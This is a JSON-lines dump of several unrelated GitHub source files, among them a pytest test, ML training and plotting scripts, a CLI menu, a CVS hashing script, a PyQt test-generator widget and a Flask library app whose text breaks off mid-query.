+{"seq_id":"37507605541","text":"from model.contact import Contact\nimport random\n\n\ndef test_contact_edit_all_fields(app, db, json_contacts, check_ui):\n contact_data = json_contacts\n app.contact.check(db, Contact(firstname=\"\", middlename=\"\", lastname=\"\", nickname=\"\", title=\"\", company=\"\",\n address=\"\", home=\"\", mobile=\"\", work=\"\", fax=\"\", email1=\"\", email2=\"\", email3=\"\",\n homepage=\"\", bday=\"\", bmonth=\"-\", byear=\"\", aday=\"\", amonth=\"-\", ayear=\"\", address2=\"\",\n phone2=\"\", notes=\"\"))\n old_contacts = db.get_contact_list()\n contact = random.choice(old_contacts)\n contact_data.id = contact.id\n 
app.contact.edit_contact_by_id(contact.id, contact_data)\n new_contacts = db.get_contact_list()\n old_contacts.remove(contact)\n old_contacts.append(contact_data)\n assert sorted(old_contacts, key=Contact.id_or_max) == sorted(new_contacts, key=Contact.id_or_max)\n # опциональная проверка, если при запуске указан check_ui\n app.contact.ui_check(db, check_ui)","repo_name":"voronova-ea/python_training","sub_path":"test/test_edit_contact.py","file_name":"test_edit_contact.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70825109053","text":"from gensim.models import Word2Vec\nimport argparse\nimport numpy as np\nimport pickle\nimport matplotlib.pyplot as plt\n\ndef load__match_dict(n2v_match_dict_dir):\n with open(n2v_match_dict_dir, 'rb') as f:\n loaded_dict = pickle.load(f)\n return loaded_dict\n\ndef plot_embedding_viz(node_embeddings_2d, labels, save_path, args):\n node_emb_2d_pos = []\n node_emb_2d_neg = []\n for i in range(len(labels)):\n if labels[i] == 1:\n node_emb_2d_pos.append(node_embeddings_2d[i, :])\n else:\n node_emb_2d_neg.append(node_embeddings_2d[i, :])\n\n\n plt.figure(figsize=(10, 8))\n plt.scatter(\n np.array(node_emb_2d_neg)[:, 0],\n np.array(node_emb_2d_neg)[:, 1],\n c = \"#a8cce4\",\n s = 6,\n alpha = 0.5,\n )\n plt.scatter(\n np.array(node_emb_2d_pos)[:, 0],\n np.array(node_emb_2d_pos)[:, 1],\n c = \"#fc6b03\",\n s = 6,\n alpha = 0.6,\n )\n plt.xlabel('{}-1'.format(args.dim_reduce_way))\n plt.ylabel('{}-2'.format(args.dim_reduce_way))\n plt.title('{reduce_way} of {gene_subset} dim_{dim} walk_len_{len} num_walks_{num}'.format(reduce_way = args.dim_reduce_way, gene_subset = args.gene_subset, dim=args.dim, len=args.walk_len, num=args.num_walks))\n plt.savefig(save_path + '/embedding_viz_{gene_subset}_{reduce}_{dim}_{walk_len}_{num_walk}.png'.format(gene_subset=args.gene_subset, reduce=args.dim_reduce_way, dim=args.dim, walk_len=args.walk_len, num_walk=args.num_walks))\n \n \ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--n2v_model_emb_dir\",\n default=None,\n type=str,\n required=True,\n help=\"ph.\",\n )\n\n parser.add_argument(\n \"--cancer_gene_data_dir\",\n default=None,\n type=str,\n required=True,\n help=\"Path where the cancer data are saved.\",\n )\n\n parser.add_argument(\n \"--output_dir\",\n default=None,\n type=str,\n required=True,\n help=\"Path where the output files are saved.\",\n )\n\n parser.add_argument(\n \"--gene_subset\",\n default=None,\n type=str,\n required=True,\n help=\".\",\n )\n parser.add_argument(\n \"--dim_reduce_way\",\n default=None,\n type=str,\n required=True,\n help=\".\",\n )\n parser.add_argument(\n \"--dim\",\n default=None,\n type=str,\n required=True,\n help=\".\",\n )\n parser.add_argument(\n \"--walk_len\",\n default=None,\n type=str,\n required=True,\n help=\".\",\n )\n parser.add_argument(\n \"--num_walks\",\n default=None,\n type=str,\n required=True,\n help=\".\",\n )\n\n args = parser.parse_args() \n with open(\"/.mounts/labs/reimandlab/private/users/gli/BCB430/codes/new_implementation_n2v/all_interaction/graph_and_match_dict/match_dict_all.pkl\", 'rb') as f:\n match_dict = pickle.load(f)\n \n with open(\"/.mounts/labs/reimandlab/private/users/gli/BCB430/codes/new_implementation_n2v/all_interaction/graph_and_match_dict/match_dict_all_int_ensembl.pkl\", 'rb') as f2:\n match_dict_int_ensembl = pickle.load(f2)\n \n with 
open(\"/.mounts/labs/reimandlab/private/users/gli/BCB430/codes/new_implementation_n2v/all_interaction/node_embeddings_original/node_embeddgins_origin.emb\", \"r\") as f3:\n node_names = []\n rows = f3.readlines()\n for row in rows[1:]:\n node_name = row.strip().split(\" \")[0]\n node_names.append(node_name)\n node_names_vector = np.array(node_names)\n \n node_embeddings_2d = np.load(args.n2v_model_emb_dir + \"/{reduce}_2d_emb_{dim}_{walk_len}_{num_walk}.npy\".format(reduce=args.dim_reduce_way, dim=args.dim, walk_len=args.walk_len, num_walk=args.num_walks))\n if args.gene_subset == \"all\":\n with open(args.cancer_gene_data_dir) as f1:\n lines = f1.readlines()\n all_genes_from_msigDB = []\n for line in lines:\n pos_genes = line.split('\\t')[2:]\n for each_gene in pos_genes:\n if each_gene in match_dict:\n all_genes_from_msigDB.append(match_dict[each_gene][0])\n\n node_names = node_names_vector # one-to-one match\n labels_for_viz_binary = []\n for node in node_names:\n node_key = list(match_dict_int_ensembl.keys())[list(match_dict_int_ensembl.values()).index(node)]\n if node_key in all_genes_from_msigDB:\n labels_for_viz_binary.append(1)\n else:\n labels_for_viz_binary.append(0)\n\n else:\n with open(args.cancer_gene_data_dir) as f1:\n lines = f1.readlines()\n msigDB_dict = {}\n for line in lines:\n msigDB_dict[line.split('\\t')[0]] = []\n pos_genes = line.split('\\t')[2:]\n for each_gene in pos_genes:\n if each_gene in match_dict:\n msigDB_dict[line.split('\\t')[0]].append(match_dict[each_gene][0])\n\n node_names = node_names_vector # one-to-one match\n labels_for_viz_binary = []\n\n for node in node_names:\n node_key = list(match_dict_int_ensembl.keys())[list(match_dict_int_ensembl.values()).index(node)]\n if node_key in msigDB_dict[args.gene_subset]:\n labels_for_viz_binary.append(1)\n else:\n labels_for_viz_binary.append(0)\n \n \n plot_embedding_viz(node_embeddings_2d, labels_for_viz_binary, args.output_dir, args)\n \nif __name__ == \"__main__\":\n main()","repo_name":"reimandlab/PPI_network_based_gene_type_prediction_model","sub_path":"src/005_plot_emb_viz.py","file_name":"005_plot_emb_viz.py","file_ext":"py","file_size_in_byte":5559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2864034218","text":"from PIL import Image\nfrom random import shuffle\nfrom matplotlib.colors import rgb_to_hsv, hsv_to_rgb\nfrom utils.utils import gaussian_radius, draw_gaussian\nimport numpy as np\nimport math\nimport cv2\nimport tensorflow as tf\nimport keras.backend as K\n\ndef preprocess_image(image):\n mean = [0.40789655, 0.44719303, 0.47026116]\n std = [0.2886383, 0.27408165, 0.27809834]\n return ((np.float32(image) / 255.) 
- mean) / std\n \ndef focal_loss(hm_pred, hm_true):\n # 找到正样本和负样本\n pos_mask = tf.cast(tf.equal(hm_true, 1), tf.float32)\n # 小于1的都是负样本\n neg_mask = tf.cast(tf.less(hm_true, 1), tf.float32)\n neg_weights = tf.pow(1 - hm_true, 4)\n\n pos_loss = -tf.log(tf.clip_by_value(hm_pred, 1e-6, 1.)) * tf.pow(1 - hm_pred, 2) * pos_mask\n neg_loss = -tf.log(tf.clip_by_value(1 - hm_pred, 1e-6, 1.)) * tf.pow(hm_pred, 2) * neg_weights * neg_mask\n\n num_pos = tf.reduce_sum(pos_mask)\n pos_loss = tf.reduce_sum(pos_loss)\n neg_loss = tf.reduce_sum(neg_loss)\n\n cls_loss = tf.cond(tf.greater(num_pos, 0), lambda: (pos_loss + neg_loss) / num_pos, lambda: neg_loss)\n return cls_loss\n\n\ndef reg_l1_loss(y_pred, y_true, indices, mask):\n b, c = tf.shape(y_pred)[0], tf.shape(y_pred)[-1]\n k = tf.shape(indices)[1]\n\n y_pred = tf.reshape(y_pred, (b, -1, c))\n length = tf.shape(y_pred)[1]\n indices = tf.cast(indices, tf.int32)\n\n # 找到其在1维上的索引\n batch_idx = tf.expand_dims(tf.range(0, b), 1)\n batch_idx = tf.tile(batch_idx, (1, k))\n full_indices = (tf.reshape(batch_idx, [-1]) * tf.to_int32(length) +\n tf.reshape(indices, [-1]))\n # 取出对应的预测值\n y_pred = tf.gather(tf.reshape(y_pred, [-1,c]),full_indices)\n y_pred = tf.reshape(y_pred, [b, -1, c])\n\n mask = tf.tile(tf.expand_dims(mask, axis=-1), (1, 1, 2))\n # 求取l1损失值\n total_loss = tf.reduce_sum(tf.abs(y_true * mask - y_pred * mask))\n reg_loss = total_loss / (tf.reduce_sum(mask) + 1e-4)\n return reg_loss\n\n\ndef loss(args):\n #-----------------------------------------------------------------------------------------------------------------#\n # hm_pred:热力图的预测值 (self.batch_size, self.output_size[0], self.output_size[1], self.num_classes)\n # wh_pred:宽高的预测值 (self.batch_size, self.output_size[0], self.output_size[1], 2)\n # reg_pred:中心坐标偏移预测值 (self.batch_size, self.output_size[0], self.output_size[1], 2)\n # hm_true:热力图的真实值 (self.batch_size, self.output_size[0], self.output_size[1], self.num_classes)\n # wh_true:宽高的真实值 (self.batch_size, self.max_objects, 2)\n # reg_true:中心坐标偏移真实值 (self.batch_size, self.max_objects, 2)\n # reg_mask:真实值的mask (self.batch_size, self.max_objects)\n # indices:真实值对应的坐标 (self.batch_size, self.max_objects)\n #-----------------------------------------------------------------------------------------------------------------#\n hm_pred, wh_pred, reg_pred, hm_true, wh_true, reg_true, reg_mask, indices = args\n hm_loss = focal_loss(hm_pred, hm_true)\n wh_loss = 0.1 * reg_l1_loss(wh_pred, wh_true, indices, reg_mask)\n reg_loss = reg_l1_loss(reg_pred, reg_true, indices, reg_mask)\n total_loss = hm_loss + wh_loss + reg_loss\n # total_loss = tf.Print(total_loss,[hm_loss,wh_loss,reg_loss])\n return total_loss\n\ndef rand(a=0, b=1):\n return np.random.rand()*(b-a) + a\n\nclass Generator(object):\n def __init__(self,batch_size,train_lines,val_lines,\n input_size,num_classes,max_objects=100):\n \n self.batch_size = batch_size\n self.train_lines = train_lines\n self.val_lines = val_lines\n self.input_size = input_size\n self.output_size = (int(input_size[0]/4) , int(input_size[1]/4))\n self.num_classes = num_classes\n self.max_objects = max_objects\n \n def get_random_data(self, annotation_line, input_shape, random=True, jitter=.3, hue=.1, sat=1.5, val=1.5, proc_img=True):\n '''r实时数据增强的随机预处理'''\n line = annotation_line.split()\n image = Image.open(line[0])\n iw, ih = image.size\n h, w = input_shape\n box = np.array([np.array(list(map(int,box.split(',')))) for box in line[1:]])\n\n # resize image\n new_ar = w/h * rand(1-jitter,1+jitter)/rand(1-jitter,1+jitter)\n 
scale = rand(0.25, 2)\n if new_ar < 1:\n nh = int(scale*h)\n nw = int(nh*new_ar)\n else:\n nw = int(scale*w)\n nh = int(nw/new_ar)\n image = image.resize((nw,nh), Image.BICUBIC)\n\n # place image\n dx = int(rand(0, w-nw))\n dy = int(rand(0, h-nh))\n new_image = Image.new('RGB', (w,h), (128,128,128))\n new_image.paste(image, (dx, dy))\n image = new_image\n\n # flip image or not\n flip = rand()<.5\n if flip: image = image.transpose(Image.FLIP_LEFT_RIGHT)\n\n # distort image\n hue = rand(-hue, hue)\n sat = rand(1, sat) if rand()<.5 else 1/rand(1, sat)\n val = rand(1, val) if rand()<.5 else 1/rand(1, val)\n x = cv2.cvtColor(np.array(image,np.float32)/255, cv2.COLOR_RGB2HSV)\n x[..., 0] += hue*360\n x[..., 0][x[..., 0]>1] -= 1\n x[..., 0][x[..., 0]<0] += 1\n x[..., 1] *= sat\n x[..., 2] *= val\n x[x[:,:, 0]>360, 0] = 360\n x[:, :, 1:][x[:, :, 1:]>1] = 1\n x[x<0] = 0\n image_data = cv2.cvtColor(x, cv2.COLOR_HSV2RGB)*255\n\n\n # correct boxes\n box_data = np.zeros((len(box),5))\n if len(box)>0:\n np.random.shuffle(box)\n box[:, [0,2]] = box[:, [0,2]]*nw/iw + dx\n box[:, [1,3]] = box[:, [1,3]]*nh/ih + dy\n if flip: box[:, [0,2]] = w - box[:, [2,0]]\n box[:, 0:2][box[:, 0:2]<0] = 0\n box[:, 2][box[:, 2]>w] = w\n box[:, 3][box[:, 3]>h] = h\n box_w = box[:, 2] - box[:, 0]\n box_h = box[:, 3] - box[:, 1]\n box = box[np.logical_and(box_w>1, box_h>1)] # discard invalid box\n box_data = np.zeros((len(box),5))\n box_data[:len(box)] = box\n if len(box) == 0:\n return image_data, []\n\n if (box_data[:,:4]>0).any():\n return image_data, box_data\n else:\n return image_data, []\n\n def generate(self, train=True):\n while True:\n if train:\n # 打乱\n shuffle(self.train_lines)\n lines = self.train_lines\n else:\n shuffle(self.val_lines)\n lines = self.val_lines\n \n batch_images = np.zeros((self.batch_size, self.input_size[0], self.input_size[1], self.input_size[2]), dtype=np.float32)\n batch_hms = np.zeros((self.batch_size, self.output_size[0], self.output_size[1], self.num_classes), dtype=np.float32)\n batch_whs = np.zeros((self.batch_size, self.max_objects, 2), dtype=np.float32)\n batch_regs = np.zeros((self.batch_size, self.max_objects, 2), dtype=np.float32)\n batch_reg_masks = np.zeros((self.batch_size, self.max_objects), dtype=np.float32)\n batch_indices = np.zeros((self.batch_size, self.max_objects), dtype=np.float32)\n \n b = 0\n for annotation_line in lines: \n img,y=self.get_random_data(annotation_line,self.input_size[0:2])\n\n if len(y)!=0:\n boxes = np.array(y[:,:4],dtype=np.float32)\n boxes[:,0] = boxes[:,0]/self.input_size[1]*self.output_size[1]\n boxes[:,1] = boxes[:,1]/self.input_size[0]*self.output_size[0]\n boxes[:,2] = boxes[:,2]/self.input_size[1]*self.output_size[1]\n boxes[:,3] = boxes[:,3]/self.input_size[0]*self.output_size[0]\n\n for i in range(len(y)):\n bbox = boxes[i].copy()\n bbox = np.array(bbox)\n bbox[[0, 2]] = np.clip(bbox[[0, 2]], 0, self.output_size[1] - 1)\n bbox[[1, 3]] = np.clip(bbox[[1, 3]], 0, self.output_size[0] - 1)\n cls_id = int(y[i,-1])\n \n h, w = bbox[3] - bbox[1], bbox[2] - bbox[0]\n if h > 0 and w > 0:\n ct = np.array([(bbox[0] + bbox[2]) / 2, (bbox[1] + bbox[3]) / 2], dtype=np.float32)\n ct_int = ct.astype(np.int32)\n \n # 获得热力图\n radius = gaussian_radius((math.ceil(h), math.ceil(w)))\n radius = max(0, int(radius))\n batch_hms[b, :, :, cls_id] = draw_gaussian(batch_hms[b, :, :, cls_id], ct_int, radius)\n \n batch_whs[b, i] = 1. * w, 1. 
* h\n # 计算中心偏移量\n batch_regs[b, i] = ct - ct_int\n # 将对应的mask设置为1,用于排除多余的0\n batch_reg_masks[b, i] = 1\n # 表示第ct_int[1]行的第ct_int[0]个。\n batch_indices[b, i] = ct_int[1] * self.output_size[0] + ct_int[0]\n\n # 将RGB转化成BGR\n img = np.array(img,dtype = np.float32)[:,:,::-1]\n batch_images[b] = preprocess_image(img)\n b = b + 1\n if b == self.batch_size:\n b = 0\n yield [batch_images, batch_hms, batch_whs, batch_regs, batch_reg_masks, batch_indices], np.zeros((self.batch_size,))\n\n batch_images = np.zeros((self.batch_size, self.input_size[0], self.input_size[1], 3), dtype=np.float32)\n\n batch_hms = np.zeros((self.batch_size, self.output_size[0], self.output_size[1], self.num_classes),\n dtype=np.float32)\n batch_whs = np.zeros((self.batch_size, self.max_objects, 2), dtype=np.float32)\n batch_regs = np.zeros((self.batch_size, self.max_objects, 2), dtype=np.float32)\n batch_reg_masks = np.zeros((self.batch_size, self.max_objects), dtype=np.float32)\n batch_indices = np.zeros((self.batch_size, self.max_objects), dtype=np.float32)\n","repo_name":"Bovbene/CenterNet-Keras","sub_path":"nets/center_training.py","file_name":"center_training.py","file_ext":"py","file_size_in_byte":10435,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"5768978667","text":"class Solution:\n def merge_two_sorted_array(self, arr1: list, arr2: list) -> list:\n m = len(arr1)\n n = len(arr2)\n i, j = 0, 0\n res = []\n while i < m and j < n:\n if arr1[i] > arr2[j]:\n res.append(arr2[j])\n j += 1\n else:\n res.append(arr1[i])\n i += 1\n\n while i < m:\n res.append(arr1[i])\n i += 1\n\n while j < n:\n res.append(arr2[j])\n j += 1\n\n return res\n\n\nif __name__ == \"__main__\":\n s = Solution()\n print(s.merge_two_sorted_array([1, 2, 3, 4, 5, 6], [1, 2, 4, 5]))\n","repo_name":"SanjampreetSingh/YouTube-CodeSanjam","sub_path":"Sort/05. Merge two sorted array.py","file_name":"05. Merge two sorted array.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28643460986","text":"from time import sleep\nfrom src.submenus.submenus import submenu_one, submenu_two, submenu_three\nfrom os import system\n\ndef menu_main():\n \n try:\n\n print(\"\"\"\n 1) Install tools of pentest\n 2) Red dragon Tools\n 3) System management \n -1) EXIT\n \n \"\"\")\n\n option_main = int(input(\"Your option: \"))\n\n if option_main == 1:\n \n submenu_one()\n\n elif option_main == 2:\n \n submenu_two()\n\n elif option_main == 3:\n \n submenu_three()\n\n elif option_main == -1:\n\n print(\"Goodbye...\")\n sleep(1)\n system(\"clear\")\n\n else:\n system(\"clear\")\n print(\"Invalid option. 
Try again.\")\n menu_main()\n \n except Exception as error:\n\n print(\"Error: {}\".format(error))\n \n\n","repo_name":"charlesdev771/Red-Dragon","sub_path":"src/menus/menu_main.py","file_name":"menu_main.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24213243427","text":"import sys;\nimport os;\nimport subprocess;\nimport csv;\nimport hashlib;\n\nrepo = sys.argv[1] # '/home/rich/sstore3/gentoo-gitmig/cvs/checkout/gentoo-x86/'\nmodule = sys.argv[2] # 'gentoo-x86/'\n\noutfile=csv.writer(sys.stdout);\nos.chdir(repo);\n\nfor line in sys.stdin:\n line=line.strip();\n if len(line) > 0:\n for row in csv.reader([line]):\n filename,filetime,author,message,revision,state = row\n if state != \"dead\":\n output=subprocess.check_output([\"cvs\",\"co\",\"-p\",\"-r\",revision,module+filename]).split(\"\\n\")\n output='\\n'.join(output)\n final=\"blob \"+str(len(output))+\"\\x00\"+output;\n filehash=hashlib.sha1(final).hexdigest();\n newrow=filename,\"blob\",filehash,filetime,author,message,revision\n outfile.writerow(newrow)\n\n","repo_name":"rich0/gitvalidate","sub_path":"cvsdump/cvscalchash.py","file_name":"cvscalchash.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"41181077612","text":"import os\n\nfrom PyQt5.QtCore import Qt, pyqtSignal\nfrom PyQt5.QtWidgets import QVBoxLayout, QHBoxLayout, QPushButton, QDialog, QListWidget, \\\n QLineEdit\n\nfrom code_tab.console import Console\nfrom ui.message_box import MessageBox\nfrom code_tab.syntax_highlighter import CodeEditor\nfrom ui.side_panel_widget import SidePanelWidget\n\n\nclass GeneratorTab(SidePanelWidget):\n complete = pyqtSignal()\n\n def __init__(self, sm, cm, tm):\n super().__init__(sm, tm, 'Генерация тестов', ['load', 'save', 'run', 'close'])\n self.setWindowTitle(\"TestGenerator\")\n self.resize(600, 400)\n\n self.cm = cm\n self.test_type = 'pos'\n\n main_layout = QVBoxLayout()\n main_layout.setContentsMargins(0, 0, 0, 0)\n\n self.code_edit = CodeEditor(self.sm, self.tm, language='Python', border=True)\n main_layout.addWidget(self.code_edit)\n\n self.console = Console(self.sm, self.tm, self.cm)\n self.console.hide()\n main_layout.addWidget(self.console)\n\n self.setLayout(main_layout)\n\n self.buttons['load'].clicked.connect(self.open_code)\n self.buttons['save'].clicked.connect(self.save_code)\n # self.buttons['documentation'].clicked.connect(self.show_info)\n self.buttons['close'].clicked.connect(self.close_console)\n self.buttons['run'].clicked.connect(self.run_code)\n\n self.set_autocompletion()\n\n self.dialog = None\n self.scripts_dir = f\"{self.sm.app_data_dir}/scripts\"\n\n def set_theme(self):\n super().set_theme()\n self.code_edit.set_theme()\n self.console.set_theme()\n\n def open_code(self):\n self.dialog = FileDialog(self.tm, 'open', self.scripts_dir)\n if self.dialog.exec():\n try:\n with open(os.path.join(self.scripts_dir, self.dialog.list_widget.currentItem().text()),\n encoding='utf-8') as f:\n self.code_edit.set_text(f.read())\n except Exception as ex:\n print(f\"{ex.__class__.__name__}: {ex}\")\n\n def save_code(self):\n self.dialog = FileDialog(self.tm, 'save', self.scripts_dir)\n if self.dialog.exec():\n try:\n name = self.dialog.line_edit.text()\n if not name.endswith('.py'):\n name += '.py'\n file = open(f\"{self.scripts_dir}/{name}\", 'w', encoding='utf-8',\n newline=self.sm.line_sep)\n 
file.write(self.code_edit.text())\n file.close()\n except Exception as ex:\n print(f\"{ex.__class__.__name__}: {ex}\")\n\n def set_autocompletion(self):\n self.code_edit.autocomplitions = [\"open_in_file(test_num, mode='w', **kwargs)\",\n \"open_out_file(test_num, mode='w', **kwargs)\",\n \"open_args_file(test_num, mode='w', **kwargs)\",\n \"write_in(test_num, data, mode='w', **kwargs)\",\n \"write_out(test_num, data, mode='w', **kwargs)\",\n \"write_args(test_num, data, mode='w', **kwargs)\",\n \"test_count\",\n \"set_desc(test_num, desc)\",\n \"add_test(in_data='', out_data='', args='', desc='-', index=None)\",\n \"path\"]\n\n def run_code(self):\n os.makedirs(f\"{self.sm.data_lab_path()}/func_tests/{self.test_type}\", exist_ok=True)\n file = open(f'{self.sm.app_data_dir}/temp.py', 'w', encoding='utf-8', newline=self.sm.line_sep)\n file.write(self.previous_code())\n file.write(self.code_edit.text())\n file.close()\n\n self.code_edit.hide()\n self.buttons['load'].hide()\n self.buttons['save'].hide()\n self.buttons['run'].hide()\n self.buttons['close'].show()\n self.console.show()\n self.console.run_file(f'{self.sm.app_data_dir}/temp.py')\n\n # self.looper = self.cm.cmd_command_looper([self.sm.get_general('python'), f'{self.sm.app_data_dir}/temp.py'])\n # self.looper.complete.connect(self.run_complete)\n # self.looper.run()\n\n def close_console(self):\n self.console.hide()\n self.code_edit.show()\n self.buttons['close'].hide()\n self.buttons['load'].show()\n self.buttons['save'].show()\n self.buttons['run'].show()\n\n def show_info(self):\n MessageBox(MessageBox.Information, \"Генерация тестов\",\n f\"class Test:\\n\"\n f\" def __init__(self, desc='', in_data='', out_data='', args='', exit='')\\n\"\n f\" def set_desc(self, desc)\\n\"\n f\" def set_in(self, in_data)\\n\"\n f\" def set_in(self, text)\\n\"\n f\" def set_out(self, text)\\n\"\n f\" def set_args(self, args)\\n\"\n f\" def set_exit(self, exit='')\\n\"\n f\" def add_in_file(self, type='txt', text='')\\n\"\n f\" def add_out_file(self, type='txt', text='')\\n\"\n f\" def add_check_file(self, index: int, type='txt', text='')\\n\\n\"\n f\"def add_test(test: Test, index=None)\", self.tm)\n\n def previous_code(self):\n return f\"\"\"\nimport json\n\n__tests_list__ = []\n\n\nclass Test:\n def __init__(self, desc='', in_data='', out_data='', args='', exit=''):\n self.dict = {{'desc': desc, 'in': in_data, 'out': out_data, 'args': args, 'exit': exit, 'in_files': [],\n 'out_files': [], 'check_files': dict()}}\n\n def __getitem__(self, item):\n return self.dict[item]\n\n def __setitem__(self, item, value):\n self.dict[item] = value\n\n def set_desc(self, desc):\n self.dict['desc'] = str(desc)\n\n def set_in(self, text):\n self.dict['in'] = str(text)\n\n def set_out(self, text):\n self.dict['out'] = str(text)\n\n def set_args(self, args):\n self.dict['args'] = str(args)\n\n def set_exit(self, exit=''):\n self.dict['exit'] = str(exit)\n \n def add_in_file(self, type='txt', text=''):\n self.dict['in_files'].append({{'type': type, 'text': text}})\n \n def add_out_file(self, type='txt', text=''):\n self.dict['out_files'].append({{'type': type, 'text': text}})\n \n def add_check_file(self, index: int, type='txt', text=''):\n self.dict['check_files'][index] = {{'type': type, 'text': text}}\n \n \nfor el in {os.listdir(f\"{self.sm.data_lab_path()}/func_tests/{self.test_type}\")}:\n if el.rstrip('.json').isdigit():\n test = Test()\n try:\n with open(f\"{self.sm.data_lab_path()}/func_tests/{self.test_type}/{{el}}\", encoding='utf-8') as f:\n for key, 
item in json.loads(f.read()).items():\n test[key] = item\n __tests_list__.append(test)\n except json.JSONDecodeError:\n pass\n except ValueError:\n pass\ntest_count = len(__tests_list__)\npath = \"{self.sm.lab_path()}\"\ndata_path = \"{self.sm.data_lab_path()}\"\n\n\ndef add_test(test: Test, index=None):\n if index is None:\n index = len(__tests_list__) + 1\n __tests_list__.append(test)\n else:\n __tests_list[index] = test\n with open(f\"{{data_path}}/func_tests/{self.test_type}/{{index}}.json\", 'w', encoding='utf-8') as f:\n f.write(json.dumps(test.dict))\n\n\"\"\"\n\n def show(self) -> None:\n self.setDisabled(False)\n super().show()\n\n\nclass FileDialog(QDialog):\n def __init__(self, tm, mode='open', scripts_dir=''):\n super(FileDialog, self).__init__()\n self.mode = mode\n self.tm = tm\n\n os.makedirs(scripts_dir, exist_ok=True)\n\n main_layout = QVBoxLayout()\n\n self.list_widget = QListWidget()\n self.list_widget.addItems(filter(lambda s: s.endswith('.py'), os.listdir(scripts_dir)))\n\n if self.mode == 'save':\n self.line_edit = QLineEdit()\n main_layout.addWidget(self.line_edit)\n self.list_widget.currentItemChanged.connect(lambda item: self.line_edit.setText(item.text()))\n self.list_widget.doubleClicked.connect(lambda: self.accept() if self.list_widget.currentItem() else None)\n\n main_layout.addWidget(self.list_widget)\n\n buttons_layout = QHBoxLayout()\n buttons_layout.setAlignment(Qt.AlignRight)\n\n self.button_cancel = QPushButton(\"Отмена\")\n buttons_layout.addWidget(self.button_cancel)\n self.button_cancel.clicked.connect(self.reject)\n self.button_cancel.setFixedSize(80, 24)\n self.button_ok = QPushButton(\"Ок\")\n buttons_layout.addWidget(self.button_ok)\n self.button_ok.clicked.connect(self.accept)\n self.button_ok.setFixedSize(80, 24)\n\n main_layout.addLayout(buttons_layout)\n self.setLayout(main_layout)\n\n self.set_theme()\n\n def set_theme(self):\n self.setStyleSheet(self.tm.bg_style_sheet)\n for el in [self.button_cancel, self.button_ok, self.list_widget]:\n self.tm.auto_css(el)\n if self.mode == 'save':\n self.tm.auto_css(self.line_edit)\n","repo_name":"SergeiKrivko/TestGenerator","sub_path":"tests/generator_window.py","file_name":"generator_window.py","file_ext":"py","file_size_in_byte":9317,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"5227409043","text":"from flask import Flask\r\nfrom flask import render_template\r\nfrom flask import request\r\nfrom flask import redirect\r\nfrom flask import url_for\r\nimport re\r\nfrom datetime import datetime\r\nfrom datetime import date\r\nimport mysql.connector\r\nfrom mysql.connector import FieldType\r\nimport connect\r\n\r\napp = Flask(__name__)\r\n\r\ndbconn = None\r\nconnection = None\r\nuser= None\r\n\r\ndef getCursor():\r\n global dbconn\r\n global connection\r\n connection = mysql.connector.connect(user=connect.dbuser, \\\r\n password=connect.dbpass, host=connect.dbhost, \\\r\n database=connect.dbname, autocommit=True)\r\n dbconn = connection.cursor()\r\n return dbconn\r\n \r\n\r\n# The public interface\r\n@app.route(\"/\")\r\ndef home():\r\n return render_template(\"login.html\")\r\n\r\n@app.route(\"/homepage\", methods=[\"GET\"])\r\ndef homepage():\r\n member=request.args.get(\"member\") \r\n staff=request.args.get(\"staff\")\r\n global user\r\n if member:\r\n user=member\r\n return render_template(\"memberHome.html\", member=user)\r\n elif staff:\r\n user=staff\r\n return render_template(\"staffHome.html\", staff=user)\r\n return 
render_template(\"login.html\")\r\n\r\n@app.route (\"/allbooks\")\r\ndef allbooks():\r\n connection = getCursor()\r\n connection.execute(\"SELECT bookid, booktitle, author, category, \\\r\n yearofpublication FROM books ;\")\r\n bookList = connection.fetchall()\r\n return render_template (\"allbooks.html\", booklist = bookList, member=user)\r\n\r\n#Search the available books by title and/or author, See the availability of all copies of a book, whether a copy is on loan and, if so, the due date.\r\n\r\n@app.route (\"/search\")\r\ndef search():\r\n return render_template(\"search.html\", member=user)\r\n\r\n# show results of the book search, get input value from forms, allow for partial text searches\r\n@app.route (\"/searchresult\", methods=[\"POST\"])\r\ndef searchresult():\r\n searchinput=request.form.get(\"searchinput\")\r\n searchinput = \"%\" + searchinput + \"%\"\r\n connection = getCursor()\r\n\r\n connection.execute(\"SELECT books.bookid, books.booktitle, books.author, bookcopies.bookcopyid, bookcopies.format,\\\r\n loans.returned, DATEDIFF(CURDATE(),loans.loandate) \\\r\n FROM bookcopies LEFT JOIN books on books.bookid = bookcopies.bookid LEFT JOIN loans \\\r\n on bookcopies.bookcopyid=loans.bookcopyid WHERE booktitle LIKE %s OR author LIKE %s;\",(searchinput, searchinput, )) \r\n result_list = connection.fetchall()\r\n print (result_list)\r\n\r\n return render_template (\"result.html\", result_list = result_list, member=user)\r\n@app.route(\"/staff/allbooks\")\r\ndef staffallbooks():\r\n return render_template(\"staffallbooks.html\", staff=user)\r\n\r\n#Search the available books by title and/or author, See the availability of all copies of a book, whether a copy is on loan and, if so, the due date.\r\n@app.route(\"/staff/searchbook\")\r\ndef staffsearchbook():\r\n return render_template(\"staffsearchbook.html\", staff=user)\r\n\r\n## show results of the book search, get input value from forms, allow for partial text searches. \r\n@app.route (\"/staffsearchbookresult\", methods=[\"POST\"])\r\ndef staffsearchresult():\r\n searchinput=request.form.get(\"searchinput\")\r\n searchinput = \"%\" + searchinput + \"%\"\r\n connection = getCursor()\r\n\r\n connection.execute(\"SELECT books.bookid, books.booktitle, books.author, bookcopies.bookcopyid, bookcopies.format,\\\r\n loans.returned, DATEDIFF(CURDATE(),loans.loandate) \\\r\n FROM bookcopies LEFT JOIN books on books.bookid = bookcopies.bookid LEFT JOIN loans \\\r\n on 